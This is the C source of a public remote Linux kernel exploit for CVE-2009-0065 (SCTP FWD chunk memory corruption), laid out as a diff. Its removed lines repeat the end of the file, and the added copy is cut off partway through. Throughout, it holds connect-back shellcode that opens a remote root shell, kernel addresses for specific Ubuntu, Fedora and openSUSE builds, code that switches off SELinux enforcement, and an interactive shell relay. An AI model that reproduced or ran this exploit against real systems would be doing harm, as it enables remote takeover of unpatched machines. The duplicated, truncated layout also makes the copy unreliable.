-{ - struct sctp_initmsg msg; - int ret,o=1,fd; - socklen_t len_sctp=sizeof(struct sctp_initmsg); - struct sockaddr_in s,c; - - fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); - if(fd < 0) - __fatal_perror("socket: sctp SOCK_STREAM"); - - ret = setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)); - if (ret < 0) - __fatal_perror("setsockopt: SO_REUSEADDR"); - - - /* NOTE: here we assume server peer allocates 10 output streams (as default) - * if the applciation behaves differently you must probe and change channels size - * to get the correct slab */ - - if(k->allocator_type == SLAB_ALLOCATOR) // if SLAB change channel size - { - getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp); - msg.sinit_num_ostreams=50; // force 256 slab allocation - msg.sinit_max_instreams=10; - setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp); - } - else - { - getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp); - msg.sinit_num_ostreams=10; // force 96 slab allocation - msg.sinit_max_instreams=10; - setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp); - } - - - if(sp) - { - c.sin_family = PF_INET; - c.sin_port = htons(sp); - c.sin_addr.s_addr = INADDR_ANY; - ret = bind(fd, (struct sockaddr *)&c, sizeof(c)); - if(ret < 0) - __fatal_perror("bind: sctp socket"); - } - - s.sin_family = PF_INET; - s.sin_port = htons(dp); - s.sin_addr.s_addr = inet_addr(h.rhost); - - ret = connect(fd, (struct sockaddr *)&s, sizeof(s)); - if(ret < 0) - __fatal_perror("connect: sctp socket"); - - - /* send one byte of data to get correctly - * TSN from raw socket (from SACK replies) - */ - if(data) - { - ret = send(fd, "", 1, 0); - if(ret < 0) - __fatal_perror("send: sctp socket data"); - } - return fd; -} - - -static void htons_streams(__u16 s[][2], int len) -{ - int i; - for(i=0; ivsyspatchjump, k->vsyspatchjumpsize, 0); - if(ret < 0) - __fatal("Error Building Streams..."); - - htons_streams(streams, ret); - send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); - -} - - -static void multiplex(int listenfd) -{ - int ret,new_fd; - fd_set r; - struct timeval t; - char buffer[1500]; - - - FD_ZERO(&r); - FD_SET(listenfd, &r); - t.tv_sec = 3; - t.tv_usec = 0; - __msg("[**] Waiting daemons executing gettimeofday().. this can take up to one minute...\n"); - __msg("[**] .."); - fflush(stdout); - - while(select(listenfd+1, &r, NULL, NULL, &t) == 0) - { - printf(".."); - fflush(stdout); - t.tv_sec = 3; - t.tv_usec = 0; - FD_ZERO(&r); - FD_SET(listenfd, &r); - } - __msg("..\n"); - - new_fd = accept(listenfd, NULL, 0); - if(new_fd < 0) - __fatal_perror("accept: listen fd"); - - - __msg("[**] Connected!\n"); - patchjump(); - - close(listenfd); - - write(new_fd, "id\n", 3); - - FD_ZERO(&r); - FD_SET(new_fd, &r); - FD_SET(0, &r); - while(select(new_fd+1, &r, NULL, NULL, NULL) > 0) - { - if(FD_ISSET(0, &r)) // read from stdin - { - ret = read(0, buffer, sizeof(buffer)); - if(ret < 0) - __fatal_perror("read: from stdin"); - else - ret = write(new_fd, buffer, ret); - } - - if(FD_ISSET(new_fd, &r)) - { - ret = read(new_fd, buffer, sizeof(buffer)); - if(!ret) { - __msg("Endopoint closed the connection\n"); - break; - } - else if(ret > 0) - { - write(1, buffer, ret); - } - else - __fatal_perror("read: from net"); - } - - FD_ZERO(&r); - FD_SET(new_fd, &r); - FD_SET(0, &r); - } - -} - - -/* needed when exploiting old SLAB */ -void swap_to_SLAB_chunk() -{ - __u32 tmp; - __u16 tmp16; - - tmp = tsn; - tsn = tsn2; - tsn2 = tmp; - - tmp = vtag; - vtag = vtag2; - vtag2 = tmp; - - tmp16 = sport; - sport = sport2; - sport2 = tmp16; -} - - - -int main(int argc, char **argv) -{ - - int ret, fd, i, listenfd,o=1; - struct sockaddr_in l; - __u32 lh; - __u16 lp; - - sctp_getopt(argc, argv); - - listenfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); - if(setsockopt(listenfd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)) < 0) - __fatal_perror("setsockopt: SO_REUSEADDR"); - - l.sin_family = PF_INET; - l.sin_port = htons(h.lport); - l.sin_addr.s_addr = inet_addr(h.lhost); - if(bind(listenfd, (struct sockaddr *)&l, sizeof(l)) < 0) - __fatal_perror("bind: sock"); - - if(listen(listenfd, 4) < 0) - __fatal_perror("listen: sock"); - - - /* set connect back params */ - lh = inet_addr(h.lhost); - lp = htons(h.lport); - memcpy(k->scode + k->portoff, &lp, 2); - memcpy(k->scode + k->hostoff, &lh, 4); - - raw_sctp = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP); - if(raw_sctp < 0) - __fatal_perror("socket: RAW/SCTP montitor socket"); - - server_sctp.sin_family = PF_INET; - server_sctp.sin_port = htons(h.rport); - server_sctp.sin_addr.s_addr = inet_addr(h.rhost); - - __msg("[**] Monitoring Network for TSN/VTAG pairs.. \n"); - ret = clone(clone_thread, clone_stack+STACK_SIZE-8, CLONE_VM|SIGCHLD, NULL); - if(ret < 0) - __fatal_perror("clone"); - - sleep(1); - - __msg("[**] Start flushing slub cache...\n"); - for(i=0; i<=h.nconn; i++) - { - __u16 p = sport-(h.nconn-1)+i; - if(p == sport || p== sport2) - fd = make_sctp_connection(p, h.rport, 1); - else - fd = make_sctp_connection(sport-(h.nconn-1)+i, h.rport, 0); -// usleep(10); - } - - - disable_abort(); - /* wait for monitoring engine */ - wait(NULL); - - if(k->allocator_type == SLAB_ALLOCATOR) - swap_to_SLAB_chunk(); - - if(vtag && tsn && vtag2 && tsn2) - { - __u32 acc; - - __msg_f("[**] Using TSN/VTAG pairs: (TSN: %x <=> VTAG: %x) / (TSN: %x <=> VTAG: %x)...\n", tsn, vtag, tsn2, vtag2); - sleep(1); - - if(k->selinux) - { - __msg("[**] Overwriting neightboard sctp map..\n"); - acc = (k->slubsize - k->chunksize) / 2; - ret = build_stream(k->selinux, k->ptrsize, acc); - if(ret < 0) - __fatal("Error Building Streams..."); - - htons_streams(streams, ret); - send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); - - __msg("[**] Disabling Selinux Enforcing Mode..\n"); - ret = build_stream(__zero, 4, 0); - if(ret < 0) - __fatal("Error Building Streams..."); - - htons_streams(streams, ret); - send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); - } - - __msg("[**] Overwriting neightboard sctp map ......\n"); - acc = (k->slubsize - k->chunksize) / 2; - ret = build_stream(k->vsysaddr, k->ptrsize, acc); - if(ret < 0) - __fatal("Error Building Streams..."); - - htons_streams(streams, ret); - send_fwd_chunk(sport, h.rport, streams, ret, vtag, tsn); - - __msg("[**] Overwriting vsyscall shadow map..\n"); - acc = 0x930 / 2; - ret = build_stream(k->scode, k->scodesize, acc); //1176 - if(ret < 0) - __fatal("Error Building Streams..."); - - htons_streams(streams, ret); - send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); - - __msg("[**] Hijacking vsyscall shadow map..\n"); - ret = build_stream(k->vsysjump, k->vsysjumpsize, 0); - if(ret < 0) - __fatal("Error Building Streams..."); - - htons_streams(streams, ret); - send_fwd_chunk(sport2, h.rport, streams, ret, vtag2, tsn2); - - sleep(1); - } - else - __fatal("VTAG/TSN not found: network error"); - - - multiplex(listenfd); - __msg("[**] Closing Connection... \n"); - return 0; -} - -// milw0rm.com [2009-04-28] +/* CVE-2009-0065 SCTP FWD Chunk Memory Corruption + * Linux Kernel 2.6.x SCTP FWD Memory COrruption Remote Exploit + * + * coded by: sgrakkyu antifork.org + * http://kernelbof.blogspot.com + * + * + * NOTE: you need at least one sctp application bound on the target box + * + * Supported target: + * Ubuntu 7.04 x86_64 (2.6.20_15-17-generic / 2.6.20_17-server) + * Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server) + * Ubuntu 8.10 x86_64 (2.6.27_7-10 geenric/server) + * Fedora Core 10 x86_64 (default installed kernel) + * OpenSuse 11.1 x86_64 (default installed kernel) + */ + + + + +#define _GNU_SOURCE + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define __OFFSET_PORT_64 62 // 92 +#define __OFFSET_HOST_64 64 // 94 + +//#define __TARGET_SPORT 20000 + + +#ifndef __u8 +#define __u8 uint8_t +#endif + +#ifndef __u16 +#define __u16 uint16_t +#endif + +#ifndef __u32 +#define __u32 uint32_t +#endif + + + +/* start crc routines: ripped from wireshark sources */ +#define SP_LEN 2 +#define DP_LEN 2 +#define VTAG_LEN 4 +#define CHK_LEN 4 +#define HEADER_LEN (SP_LEN + DP_LEN + VTAG_LEN + CHK_LEN) + + +#define CRC32C(c,d) (c=(c>>8)^crc_c[(c^(d))&0xFF]) +static int32_t crc_c[256] = +{ +0x00000000L, 0xF26B8303L, 0xE13B70F7L, 0x1350F3F4L, +0xC79A971FL, 0x35F1141CL, 0x26A1E7E8L, 0xD4CA64EBL, +0x8AD958CFL, 0x78B2DBCCL, 0x6BE22838L, 0x9989AB3BL, +0x4D43CFD0L, 0xBF284CD3L, 0xAC78BF27L, 0x5E133C24L, +0x105EC76FL, 0xE235446CL, 0xF165B798L, 0x030E349BL, +0xD7C45070L, 0x25AFD373L, 0x36FF2087L, 0xC494A384L, +0x9A879FA0L, 0x68EC1CA3L, 0x7BBCEF57L, 0x89D76C54L, +0x5D1D08BFL, 0xAF768BBCL, 0xBC267848L, 0x4E4DFB4BL, +0x20BD8EDEL, 0xD2D60DDDL, 0xC186FE29L, 0x33ED7D2AL, +0xE72719C1L, 0x154C9AC2L, 0x061C6936L, 0xF477EA35L, +0xAA64D611L, 0x580F5512L, 0x4B5FA6E6L, 0xB93425E5L, +0x6DFE410EL, 0x9F95C20DL, 0x8CC531F9L, 0x7EAEB2FAL, +0x30E349B1L, 0xC288CAB2L, 0xD1D83946L, 0x23B3BA45L, +0xF779DEAEL, 0x05125DADL, 0x1642AE59L, 0xE4292D5AL, +0xBA3A117EL, 0x4851927DL, 0x5B016189L, 0xA96AE28AL, +0x7DA08661L, 0x8FCB0562L, 0x9C9BF696L, 0x6EF07595L, +0x417B1DBCL, 0xB3109EBFL, 0xA0406D4BL, 0x522BEE48L, +0x86E18AA3L, 0x748A09A0L, 0x67DAFA54L, 0x95B17957L, +0xCBA24573L, 0x39C9C670L, 0x2A993584L, 0xD8F2B687L, +0x0C38D26CL, 0xFE53516FL, 0xED03A29BL, 0x1F682198L, +0x5125DAD3L, 0xA34E59D0L, 0xB01EAA24L, 0x42752927L, +0x96BF4DCCL, 0x64D4CECFL, 0x77843D3BL, 0x85EFBE38L, +0xDBFC821CL, 0x2997011FL, 0x3AC7F2EBL, 0xC8AC71E8L, +0x1C661503L, 0xEE0D9600L, 0xFD5D65F4L, 0x0F36E6F7L, +0x61C69362L, 0x93AD1061L, 0x80FDE395L, 0x72966096L, +0xA65C047DL, 0x5437877EL, 0x4767748AL, 0xB50CF789L, +0xEB1FCBADL, 0x197448AEL, 0x0A24BB5AL, 0xF84F3859L, +0x2C855CB2L, 0xDEEEDFB1L, 0xCDBE2C45L, 0x3FD5AF46L, +0x7198540DL, 0x83F3D70EL, 0x90A324FAL, 0x62C8A7F9L, +0xB602C312L, 0x44694011L, 0x5739B3E5L, 0xA55230E6L, +0xFB410CC2L, 0x092A8FC1L, 0x1A7A7C35L, 0xE811FF36L, +0x3CDB9BDDL, 0xCEB018DEL, 0xDDE0EB2AL, 0x2F8B6829L, +0x82F63B78L, 0x709DB87BL, 0x63CD4B8FL, 0x91A6C88CL, +0x456CAC67L, 0xB7072F64L, 0xA457DC90L, 0x563C5F93L, +0x082F63B7L, 0xFA44E0B4L, 0xE9141340L, 0x1B7F9043L, +0xCFB5F4A8L, 0x3DDE77ABL, 0x2E8E845FL, 0xDCE5075CL, +0x92A8FC17L, 0x60C37F14L, 0x73938CE0L, 0x81F80FE3L, +0x55326B08L, 0xA759E80BL, 0xB4091BFFL, 0x466298FCL, +0x1871A4D8L, 0xEA1A27DBL, 0xF94AD42FL, 0x0B21572CL, +0xDFEB33C7L, 0x2D80B0C4L, 0x3ED04330L, 0xCCBBC033L, +0xA24BB5A6L, 0x502036A5L, 0x4370C551L, 0xB11B4652L, +0x65D122B9L, 0x97BAA1BAL, 0x84EA524EL, 0x7681D14DL, +0x2892ED69L, 0xDAF96E6AL, 0xC9A99D9EL, 0x3BC21E9DL, +0xEF087A76L, 0x1D63F975L, 0x0E330A81L, 0xFC588982L, +0xB21572C9L, 0x407EF1CAL, 0x532E023EL, 0xA145813DL, +0x758FE5D6L, 0x87E466D5L, 0x94B49521L, 0x66DF1622L, +0x38CC2A06L, 0xCAA7A905L, 0xD9F75AF1L, 0x2B9CD9F2L, +0xFF56BD19L, 0x0D3D3E1AL, 0x1E6DCDEEL, 0xEC064EEDL, +0xC38D26C4L, 0x31E6A5C7L, 0x22B65633L, 0xD0DDD530L, +0x0417B1DBL, 0xF67C32D8L, 0xE52CC12CL, 0x1747422FL, +0x49547E0BL, 0xBB3FFD08L, 0xA86F0EFCL, 0x5A048DFFL, +0x8ECEE914L, 0x7CA56A17L, 0x6FF599E3L, 0x9D9E1AE0L, +0xD3D3E1ABL, 0x21B862A8L, 0x32E8915CL, 0xC083125FL, +0x144976B4L, 0xE622F5B7L, 0xF5720643L, 0x07198540L, +0x590AB964L, 0xAB613A67L, 0xB831C993L, 0x4A5A4A90L, +0x9E902E7BL, 0x6CFBAD78L, 0x7FAB5E8CL, 0x8DC0DD8FL, +0xE330A81AL, 0x115B2B19L, 0x020BD8EDL, 0xF0605BEEL, +0x24AA3F05L, 0xD6C1BC06L, 0xC5914FF2L, 0x37FACCF1L, +0x69E9F0D5L, 0x9B8273D6L, 0x88D28022L, 0x7AB90321L, +0xAE7367CAL, 0x5C18E4C9L, 0x4F48173DL, 0xBD23943EL, +0xF36E6F75L, 0x0105EC76L, 0x12551F82L, 0xE03E9C81L, +0x34F4F86AL, 0xC69F7B69L, 0xD5CF889DL, 0x27A40B9EL, +0x79B737BAL, 0x8BDCB4B9L, 0x988C474DL, 0x6AE7C44EL, +0xBE2DA0A5L, 0x4C4623A6L, 0x5F16D052L, 0xAD7D5351L, +}; + +static __u32 sctp_crc32c(const unsigned char* buf, __u32 len) +{ + __u32 i; + __u32 crc32 = ~0U; + __u32 r; + unsigned char b0,b1,b2,b3; + + for (i = 0; i < SP_LEN + DP_LEN + VTAG_LEN; i++) + { + CRC32C(crc32, buf[i]); + } + CRC32C(crc32, 0); + CRC32C(crc32, 0); + CRC32C(crc32, 0); + CRC32C(crc32, 0); + for (i = HEADER_LEN; i < len; i++) + { + CRC32C(crc32, buf[i]); + } + r = ~crc32; + + b0 = r & 0xff; + b1 = (r>>8) & 0xff; + b2 = (r>>16) & 0xff; + b3 = (r>>24) & 0xff; + crc32 = ((b0 << 24) | (b1 << 16) | (b2 << 8) | b3); + return ( crc32 ); +} +/* end crc routines */ + +static char generic_x86_64_shellcode[] = +// prolog +"\x90\x53\x48\x31\xc0\xb0\x66\x0f\x05\x48\x31\xdb" +"\x48\x39\xd8\x75\x0f\x48\x31\xc0\xb0\x02\xcd\x80" +"\x48\x31\xdb\x48\x39\xc3\x74\x09\x5b\x48\x31\xc0" +"\xb0\x60\x0f\x05\xc3" +// connect back +"\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58" +"\x0f\x05\x48\x97\x50\x48\xb9\x02\x00\x0d\x05\x7f" +"\x00\x00\x01\x51\x48\x89\xe6\x6a\x10\x5a\x6a\x2a" +"\x58\x0f\x05\x48\x31\xdb\x48\x39\xc3\x74\x07\x48" +"\x31\xc0\xb0\xe7\x0f\x05\x90" +"\x6a\x03\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\x75" +"\xf6\x48\xbb\xd0\x9d\x96\x91\xd0\x8c\x97\xff\x48" +"\xf7\xd3\x53\x48\x89\xe7\x48\x31\xc0\x50\x57\x48" +"\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05\x48\x31\xc0" +"\xb0\xe7\x0f\x05" +; + +static const char __zero[4] = {0x00, 0x00, 0x00, 0x00}; +//static char __force_crash[] = "\x41\x41\x41\x41\x41\x41\x41\x41"; + +static char generic_x86_64_patchjump[] = "\x48\x31\xc0\xb0\x60\x0f\x05\xc3"; +static char generic_x86_64_jump[] = "\xe9\x2b\x09\x00\x00\x90"; + +/* ubuntu 7.04 */ +static char ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow[] = "\x00\x40\x56\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_20_17_server_x86_64_vsys_shadow[] = "\x00\x90\x5B\x80\xFF\xFF\xFF\xFF"; + +/* ubuntu 8.04 */ +static char ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow[] = "\x00\x50\x62\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow[] = "\x00\x40\x62\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow[] = "\x00\x30\x62\x80\xFF\xFF\xFF\xFF"; + +static char ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow[] = "\x00\x40\x5d\x80\xFF\xFF\xFF\xFF"; + +/* ubuntu 8.10 */ +static char ubuntu64_2_6_27_7_server_x86_64_vsys_shadow[] = "\x00\x30\x6f\x80\xFF\xFF\xFF\xFF"; +static char ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF"; + +static char ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow[] = "\x00\x40\x6f\x80\xFF\xFF\xFF\xFF"; + +/* fedora code 10 */ +static char fedora64_10_default_kernel_x86_64_vsys_shadow[] = "\x00\x10\x57\x81\xFF\xFF\xFF\xFF"; +static char fedora64_10_default_kernel_x86_64_selinux[] = "\x84\xE6\x7C\x81\xFF\xFF\xFF\xFF"; + +/* opensuse 11.1 */ +static char opensuse64_11_1_default_kernel_x86_64_vsys_shadow[]="\x00\x10\x8E\x80\xFF\xFF\xFF\xFF"; + + +#define __msg_f(format, args...) \ + do { fprintf(stdout, format, ## args); } while(0) + +#define __msg(msg) \ + do { fprintf(stdout, "%s", msg); } while(0) + +#define __fatal(msg) \ + do {fprintf(stderr, "%s", msg); exit(1);} while (0) + +#define __fatal_perror(msg) \ + do { perror(msg); exit(1); } while (0) + +enum { + SLAB_ALLOCATOR=0, + SLUB_ALLOCATOR=1 +}; + +typedef struct +{ + const char *name; + const char *info; + char *scode; + __u32 scodesize; + __u32 portoff; + __u32 hostoff; + const char *vsysaddr; + const char *vsysjump; + __u32 vsysjumpsize; + + const char *vsyspatchjump; + __u32 vsyspatchjumpsize; + + __u32 chunksize; + __u32 slubsize; + __u32 ptrsize; + + const char *selinux; + + int allocator_type; + +} kinfo; + +static kinfo *k; + +typedef struct +{ + const char* target; + const char* rhost; + const char* lhost; + __u16 rport; + __u16 lport; + + __u16 sport; // defines associations + __u16 nconn; + +} hinfo; + +static hinfo h = { NULL, NULL, NULL, 0, 0, 0, 600 }; + +static kinfo kernels[] = { + { + "ubuntu64_faisty-2.6.20-[15-17]-generic", + "(faisty: generic kernel)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_20_15to17_generic_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 256, + 8, + NULL, + SLAB_ALLOCATOR + }, + { + "ubuntu64_faisty-2.6.20-17-server", + "(faisty: server kernel - last 2.6.20-17 build)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_20_17_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 256, + 8, + NULL, + SLAB_ALLOCATOR + }, + { + "ubuntu64_hardy-2.6.24-[18-21]-generic", + "(kernel from 2.6.24-18 to kernel 2.6.24-21 -- generic)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_18to21_generic_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_hardy_2.6.24-[16-18]-server", + "(kernel from 2.6.24-16 to 2.6.24-18 -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_16to18_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_hardy-2.6.24-[19-22]-server", + "(kernel from 2.6.24-19 to 2.6.24-22 -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_19to22_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_hardy-2.6.24-23-last-server", + "(last 2.6.24-23 kernel before patch -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_24_23_last_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_intrepid-2.6.27-7-server", + "(kernel 2.6.27-7 -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_27_7_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_intrepid-2.6.27-[9-last]-server", + "(kernel 2.6.27-9 to the last unpatched kernel -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_27_9tolast_server_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "ubuntu64_intrepid-2.6.27-[7-last]-generic", + "(kernel 2.6.27-9 to the last unpatched kernel -- server)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + ubuntu64_2_6_27_7tolast_generic_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + NULL, + SLUB_ALLOCATOR + }, + { + "fedora64_10-2.6.25-117", + "(fedora core 10 default installed kernel)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + fedora64_10_default_kernel_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 96, + 8, + fedora64_10_default_kernel_x86_64_selinux, + SLUB_ALLOCATOR + }, + { + "opensuse64_11.1-2.6.27.7-9-default", + "(opensuse 11.1 default installed kernel)", + generic_x86_64_shellcode, + sizeof(generic_x86_64_shellcode) -1, + __OFFSET_PORT_64, + __OFFSET_HOST_64, + opensuse64_11_1_default_kernel_x86_64_vsys_shadow, + generic_x86_64_jump, + 6, + generic_x86_64_patchjump, + 8, + 40, + 256, + 8, + NULL, + SLAB_ALLOCATOR + } +}; + + + +/* modular arithmetic shift */ +#define __SHIFT_CHECK 0x7FFF +static __u16 shift_0_to_7fff[3] = { 0x7FFF, 0xFFFE, 0x0000 }; +static __u16 shift_8000_to_ffff[3] = { 0xFFFF, 0x7FFE, 0x8000 }; + +/* global streams obj */ +static __u16 streams[1000][2]; + +/* get stream flow */ +static int build_stream(const void *data, __u32 size, __u16 fc) +{ + int chunk_num,i,j,stnum=0; + __u16 *p; + __u16 *shift; + if(size % 2) + __fatal("[!!!] build_stream: data unaligned"); + + memset(streams, 0x00, sizeof(streams)); + + chunk_num = size / 2; + p = (__u16*)data; + for(i=0; isport = htons(sp); + hdr->dport = htons(dp); + hdr->vtag = htonl(vtag); + hdr->checksum = 0; + fwd = (struct sctp_chunk_fwd *)(hdr->chunks); + fwd->type = SCTP_FWD; + fwd->flags = 0; + fwd->len = htons(4 + 4 + (streamlen * 4)); // chunk + ctsn + streams + fwd->new_tsn = htonl(tsn+1); + + /* build stream */ + pstream = (__u16 *)((&(fwd->new_tsn)) + 1); + for(i=0; ilen) + sizeof(*hdr); + hdr->checksum = htonl(sctp_crc32c(__buff, (__u32)(*p_len))); + return hdr; +} + + + +/* this function gets VTAG/TSN bound with this socket pair */ +int raw_socket_engine(__u16 sp, __u16 sp2, __u16 dp, + __u32 *tsn, __u32 *vtag, __u32 *tsn2, __u32 *vtag2) +{ + char packet[1500]; + int p_len; + void *end; + struct sctp_hdr *hdr; + struct sctp_chk *chk; + __u32 tmp; + __u16 psp,pdp; + fd_set r; + struct timeval tv; + + int raw_fd = socket(PF_INET, SOCK_RAW, IPPROTO_SCTP); + if(raw_fd < 0) + __fatal_perror("socket: RAW/SCTP"); + + + FD_ZERO(&r); + FD_SET(raw_fd, &r); + tv.tv_usec=0; + tv.tv_sec=10; + + while(select(raw_fd + 1, &r, NULL,NULL,&tv) > 0) + { + p_len = read(raw_fd, packet, sizeof(packet)); + end = packet + p_len; + hdr = (struct sctp_hdr *)(packet + sizeof(struct iphdr)); + if((void*)(((char *)hdr)+4) >= end) + continue; + + /* check for chunk */ + chk = (struct sctp_chk *)(hdr->chunks); + tmp = ntohl(*((__u32*)(chk->data))); + psp = ntohs(hdr->sport); + pdp = ntohs(hdr->dport); + + if(chk->type == SCTP_SACK) + { + if(psp == dp && pdp == sp) + *tsn = tmp; + + if(psp == dp && pdp == sp2) + *tsn2 = tmp; + } + + if(chk->type == SCTP_INIT_ACK) + { + if(psp == dp && pdp == sp) + *vtag = tmp; + + if(psp == dp && pdp == sp2) + *vtag2 = tmp; + } + + if(*vtag && *tsn && *vtag2 && *tsn2) + break; + + FD_ZERO(&r); + FD_SET(raw_fd, &r); + tv.tv_usec=0; + tv.tv_sec=10; + } + + return 0; +} + +/* global vars */ +static __u16 sport=0; +static __u16 sport2=0; +static __u32 vtag=0, vtag2=0; +static __u32 tsn=0, tsn2=0; + +static struct sockaddr_in server_sctp; +int raw_sctp=-1; + +#define STACK_SIZE 0x1000 +char clone_stack[STACK_SIZE*2]; + + +static void send_fwd_chunk(__u16 sp, __u16 dp, __u16 streams[][2], + int streamlen, __u32 vtag, __u32 tsn) +{ + int p_len=0, ret; + void *packet = make_fwd_packet(sp, dp, vtag, tsn, streams, streamlen, &p_len); + ret = sendto(raw_sctp, packet, p_len, 0, (struct sockaddr *)&server_sctp, sizeof(struct sockaddr_in)); + if(ret < 0) + __fatal_perror("sendto: sending FWD chunk"); + + free(packet); +} + + + +static int clone_thread(void *p) +{ + raw_socket_engine(sport, sport2, h.rport, &tsn, &vtag, &tsn2, &vtag2); + return 0; +} + + +static int make_sctp_connection(__u16 sp, __u16 dp, int data) +{ + struct sctp_initmsg msg; + int ret,o=1,fd; + socklen_t len_sctp=sizeof(struct sctp_initmsg); + struct sockaddr_in s,c; + + fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP); + if(fd < 0) + __fatal_perror("socket: sctp SOCK_STREAM"); + + ret = setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o)); + if (ret < 0) + __fatal_perror("setsockopt: SO_REUSEADDR"); + + + /* NOTE: here we assume server peer allocates 10 output streams (as default) + * if the applciation behaves differently you must probe and change channels size + * to get the correct slab */ + + if(k->allocator_type == SLAB_ALLOCATOR) // if SLAB change channel size + { + getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp); + msg.sinit_num_ostreams=50; // force 256 slab allocation + msg.sinit_max_instreams=10; + setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp); + } + else + { + getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp); + msg.sinit_num_ostreams=10; // force 96 slab allocation + msg.sinit_max_instreams=10; + setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp); + } + + + if(sp) + { + c.sin_family = PF_INET; + c.sin_port = htons(sp); + c.sin_addr.s_addr = INADDR_ANY; + ret = bind(fd, (struct sockaddr *)&c, sizeof(c)); + if(ret < 0) + __fatal_perror("bind: sctp socket"); + } + + s.sin_family = PF_INET; + s.sin_port = htons(dp); + s.sin_addr.s_addr = inet_addr(h.rhost); + + ret = connect(fd, (struct sockaddr *)&s, sizeof(s)); + if(ret < 0) + __fatal_perror("connect: sctp socket"); + + + /* send one byte of data to get correctly + * TSN from raw socket (from SACK replies) + */ + if(data) + { + ret = send(fd, "", 1, 0); + if(ret < 0) + __fatal_perror("send: sctp socket data"); + } + return fd; +} + + +static void htons_streams(__u16 s[][2], int len) +{ + int i; + for(i=0; ivsyspatchjump, k->vsyspatchjumpsize, 0); + if(ret < 0) + __fatal("Error Building Streams..."); + + htons_streams(streams, ret); + send_fwd_chunk(sport2, h.rport, streams, 